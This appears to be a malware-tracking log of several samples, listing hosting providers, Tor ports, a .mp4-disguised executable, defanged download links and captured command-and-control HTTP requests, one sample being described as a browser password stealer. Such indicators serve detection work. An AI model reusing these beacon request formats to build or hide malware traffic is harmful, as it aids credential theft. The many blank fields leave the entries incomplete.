Malware Using Tor (Hosted In United States, Matawan, Choopa LLC)

Domain:
Resolved: [ ] to [ ]
Resolved: [ ] to [ ]
Other IPs used:

Opened listening ports:
9050 tcp
1028 tcp

Executable is spoofed to .mp4.

Get it here: hxxp://

Hosting infos: Malware hosted in Russian Federation (Moscow, Avguro Technologies Ltd. Hosting Service Provider)

Domain name:

HTTP requests:

Data:
POST /finsess.php HTTP/1.0
Host:
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

1=1882869218&2=&3=&99=15&^

Get sample here: hxxp://

Hosting infos: Malware hosted in Russian Federation (Moscow, Fast Serv Inc.)

URL: hxxp://

Data:
POST /b/connect/2 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)
Host:
Content-Length: 51
Cache-Control: no-cache

cs=aW5zZXJ0&p=Windows+XP+32+HOME&m=3107216218&v=3.0

Hosting infos: Hosted in Spain (Madrid, Propelin Consulting S.l.u.)

Contacts domains:

Contacts server:

In general it steals passwords from browsers and gets all the information from the infected machines.

GET /installer_stats/?action_id=1003&action_description=Virtual&channel_id=&channel_subid=1&channel_param=0&installer_id=101&installer_version= HTTP/1.1
User-Agent: NSIS_ToolkitOffers (Mozilla)
Host:
Cache-Control: no-cache

Sample here:

Hosting infos: Malware hosted in Bosnia And Herzegovina (Banja Luka, Blicnet D.o.o.)

Domains used by the malware:

HTTP requests:

URI:

Data:
POST /dffgbDFGvf465/YYf.php HTTP/1.0
Host:
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 272
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Samples: